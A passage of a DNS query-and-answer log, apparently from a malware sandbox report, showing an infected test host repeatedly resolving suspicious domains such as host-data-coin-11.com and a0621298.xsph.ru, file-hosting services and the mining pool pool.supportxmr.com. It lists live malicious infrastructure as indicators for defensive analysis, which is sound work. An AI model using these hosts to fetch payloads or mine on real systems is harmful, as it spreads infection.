                                                                                                                                                                                                        Jan 14, 2022 00:15:27.475970984 CET192.168.2.48.8.8.80x45d7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.929191113 CET192.168.2.48.8.8.80xd04fStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:42.591212988 CET192.168.2.48.8.8.80x6afStandard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:48.683623075 CET192.168.2.48.8.8.80x9e4bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:48.853013992 CET192.168.2.48.8.8.80x56abStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.095482111 CET192.168.2.48.8.8.80x22c2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.260747910 CET192.168.2.48.8.8.80xafe7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.424179077 CET192.168.2.48.8.8.80xda2aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.588679075 CET192.168.2.48.8.8.80x9b8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.767848015 CET192.168.2.48.8.8.80xe42dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.060847998 CET192.168.2.48.8.8.80x1ab9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.231005907 CET192.168.2.48.8.8.80xbd50Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.394597054 CET192.168.2.48.8.8.80x96b5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.560926914 CET192.168.2.48.8.8.80xdc5dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.750709057 CET192.168.2.48.8.8.80x9e07Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.917156935 CET192.168.2.48.8.8.80xee49Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:51.125756979 CET192.168.2.48.8.8.80x2ddaStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.295429945 CET192.168.2.48.8.8.80x10d7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.453470945 CET192.168.2.48.8.8.80x9efdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.614363909 CET192.168.2.48.8.8.80x8aedStandard query (0)goo.suA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.026356936 CET192.168.2.48.8.8.80xc7d7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.208574057 CET192.168.2.48.8.8.80x4298Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.423022985 CET192.168.2.48.8.8.80x29f3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.580876112 CET192.168.2.48.8.8.80xc73aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.747313023 CET192.168.2.48.8.8.80x31e0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.914865971 CET192.168.2.48.8.8.80x9952Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:57.103195906 CET192.168.2.48.8.8.80xf2cStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.355787039 CET192.168.2.48.8.8.80x5dfaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.521006107 CET192.168.2.48.8.8.80x51daStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.755677938 CET192.168.2.48.8.8.80x9907Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.044022083 CET192.168.2.48.8.8.80x5b1bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.223881960 CET192.168.2.48.8.8.80xd305Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.390018940 CET192.168.2.48.8.8.80x48a5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.591588974 CET192.168.2.48.8.8.80x6886Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.824183941 CET192.168.2.48.8.8.80x7dc1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.016208887 CET192.168.2.48.8.8.80xcdf3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.189146996 CET192.168.2.48.8.8.80xd2abStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.358738899 CET192.168.2.48.8.8.80x10e6Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.475105047 CET192.168.2.48.8.8.80x1d04Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.636070967 CET192.168.2.48.8.8.80x47a2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.801625967 CET192.168.2.48.8.8.80xd460Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.337502003 CET192.168.2.48.8.8.80xd5ffStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.555936098 CET192.168.2.48.8.8.80xb8a9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.839423895 CET192.168.2.48.8.8.80xa9f5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:09.013679981 CET192.168.2.48.8.8.80xc4ecStandard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:11.631227970 CET192.168.2.48.8.8.80xb620Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:12.475086927 CET192.168.2.48.8.8.80x824cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:12.673590899 CET192.168.2.48.8.8.80xce37Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:13.988838911 CET192.168.2.48.8.8.80xe413Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.287476063 CET192.168.2.48.8.8.80xb20fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.658121109 CET192.168.2.48.8.8.80x165Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:18.495066881 CET192.168.2.48.8.8.80x185Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:18.692121983 CET192.168.2.48.8.8.80x7768Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:21.204607964 CET192.168.2.48.8.8.80xcd02Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:21.791950941 CET192.168.2.48.8.8.80x670cStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:22.426749945 CET192.168.2.48.8.8.80xd3feStandard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.147851944 CET192.168.2.48.8.8.80x3019Standard query (0)patmushta.infoA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.197062969 CET192.168.2.48.8.8.80xdbf8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.203850031 CET192.168.2.48.8.8.80x8de8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.748819113 CET192.168.2.48.8.8.80xa426Standard query (0)a0621298.xsph.ruA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:31.828166962 CET192.168.2.48.8.8.80x8a9Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:33.387123108 CET192.168.2.48.8.8.80x22eStandard query (0)microsoft-com.mail.protection.outlook.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:51.736057043 CET192.168.2.48.8.8.80xdb81Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:17:13.778686047 CET192.168.2.48.8.8.80x5e1Standard query (0)patmushta.infoA (IP address)IN (0x0001)

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.466722965 CET8.8.8.8192.168.2.40x1e78No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:08.926810026 CET8.8.8.8192.168.2.40x7eb5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.401787996 CET8.8.8.8192.168.2.40xbc1cNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:09.575335979 CET8.8.8.8192.168.2.40x8fbaNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.039287090 CET8.8.8.8192.168.2.40xf7efNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:10.473891973 CET8.8.8.8192.168.2.40xdd6eNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.090094090 CET8.8.8.8192.168.2.40x4665No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.250962019 CET8.8.8.8192.168.2.40x96b7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:12.447144985 CET8.8.8.8192.168.2.40x550fNo error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:14.257040977 CET8.8.8.8192.168.2.40xcfaNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:14.427084923 CET8.8.8.8192.168.2.40xa3f6No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:14.904640913 CET8.8.8.8192.168.2.40x786bNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:15.190542936 CET8.8.8.8192.168.2.40xe925No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:15.666140079 CET8.8.8.8192.168.2.40x9efbNo error (0)privacy-tools-for-you-780.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:17.977097034 CET8.8.8.8192.168.2.40x644fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.161992073 CET8.8.8.8192.168.2.40x60c7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.650316000 CET8.8.8.8192.168.2.40x9905No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:18.739072084 CET8.8.8.8192.168.2.40x4acbNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:19.402050972 CET8.8.8.8192.168.2.40xa2b4No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:19.897456884 CET8.8.8.8192.168.2.40x1c8cNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:20.083414078 CET8.8.8.8192.168.2.40xc340No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:20.562536001 CET8.8.8.8192.168.2.40x2005No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.423297882 CET8.8.8.8192.168.2.40x5113No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.586868048 CET8.8.8.8192.168.2.40x9be3No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.754504919 CET8.8.8.8192.168.2.40xdd94No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:22.920911074 CET8.8.8.8192.168.2.40x4237No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:24.943259954 CET8.8.8.8192.168.2.40xac12No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.101136923 CET8.8.8.8192.168.2.40x65dbNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.297411919 CET8.8.8.8192.168.2.40xd16aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:25.463532925 CET8.8.8.8192.168.2.40x2be3No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.160053968 CET8.8.8.8192.168.2.40xe05No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.333893061 CET8.8.8.8192.168.2.40xc920No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:27.495369911 CET8.8.8.8192.168.2.40x45d7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:39.956341028 CET8.8.8.8192.168.2.40xd04fNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:42.897193909 CET8.8.8.8192.168.2.40x6afNo error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:48.703727007 CET8.8.8.8192.168.2.40x9e4bNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:48.873003960 CET8.8.8.8192.168.2.40x56abNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.115181923 CET8.8.8.8192.168.2.40x22c2No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.279900074 CET8.8.8.8192.168.2.40xafe7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.443753004 CET8.8.8.8192.168.2.40xda2aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.610033989 CET8.8.8.8192.168.2.40x9b8No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:49.790723085 CET8.8.8.8192.168.2.40xe42dNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.081588984 CET8.8.8.8192.168.2.40x1ab9No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.252104998 CET8.8.8.8192.168.2.40xbd50No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.413388014 CET8.8.8.8192.168.2.40x96b5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.582348108 CET8.8.8.8192.168.2.40xdc5dNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.770617008 CET8.8.8.8192.168.2.40x9e07No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:50.936686993 CET8.8.8.8192.168.2.40xee49No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:51.145322084 CET8.8.8.8192.168.2.40x2ddaNo error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.314858913 CET8.8.8.8192.168.2.40x10d7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.472961903 CET8.8.8.8192.168.2.40x9efdNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.635926008 CET8.8.8.8192.168.2.40x8aedNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:55.635926008 CET8.8.8.8192.168.2.40x8aedNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.045312881 CET8.8.8.8192.168.2.40xc7d7No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.225570917 CET8.8.8.8192.168.2.40x4298No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.442231894 CET8.8.8.8192.168.2.40x29f3No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.600402117 CET8.8.8.8192.168.2.40xc73aNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.764776945 CET8.8.8.8192.168.2.40x31e0No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:56.934189081 CET8.8.8.8192.168.2.40x9952No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:57.123147011 CET8.8.8.8192.168.2.40xf2cNo error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.375186920 CET8.8.8.8192.168.2.40x5dfaNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.541596889 CET8.8.8.8192.168.2.40x51daNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:15:59.774959087 CET8.8.8.8192.168.2.40x9907No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.064773083 CET8.8.8.8192.168.2.40x5b1bNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.243716002 CET8.8.8.8192.168.2.40xd305No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.410080910 CET8.8.8.8192.168.2.40x48a5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.609232903 CET8.8.8.8192.168.2.40x6886No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:02.845551968 CET8.8.8.8192.168.2.40x7dc1No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.037575960 CET8.8.8.8192.168.2.40xcdf3No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.209789038 CET8.8.8.8192.168.2.40xd2abNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:03.380450010 CET8.8.8.8192.168.2.40x10e6No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.494786978 CET8.8.8.8192.168.2.40x1d04No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.655414104 CET8.8.8.8192.168.2.40x47a2No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:06.821372032 CET8.8.8.8192.168.2.40xd460No error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.358143091 CET8.8.8.8192.168.2.40xd5ffNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.573673010 CET8.8.8.8192.168.2.40xb8a9No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:08.859005928 CET8.8.8.8192.168.2.40xa9f5No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:09.300795078 CET8.8.8.8192.168.2.40xc4ecNo error (0)data-host-coin-8.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:11.650517941 CET8.8.8.8192.168.2.40xb620No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:12.494309902 CET8.8.8.8192.168.2.40x824cNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:12.692929983 CET8.8.8.8192.168.2.40xce37No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.010508060 CET8.8.8.8192.168.2.40xe413No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.304579020 CET8.8.8.8192.168.2.40xb20fNo error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:14.678030968 CET8.8.8.8192.168.2.40x165No error (0)host-data-coin-11.com93.189.42.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:18.515554905 CET8.8.8.8192.168.2.40x185No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:18.712820053 CET8.8.8.8192.168.2.40x7768No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:21.225965977 CET8.8.8.8192.168.2.40xcd02No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:21.818962097 CET8.8.8.8192.168.2.40x670cNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:22.446170092 CET8.8.8.8192.168.2.40xd3feNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.220061064 CET8.8.8.8192.168.2.40xdbf8No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.220061064 CET8.8.8.8192.168.2.40xdbf8No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.220061064 CET8.8.8.8192.168.2.40xdbf8No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.220061064 CET8.8.8.8192.168.2.40xdbf8No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.220061064 CET8.8.8.8192.168.2.40xdbf8No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.226542950 CET8.8.8.8192.168.2.40x8de8No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.226542950 CET8.8.8.8192.168.2.40x8de8No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.226542950 CET8.8.8.8192.168.2.40x8de8No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
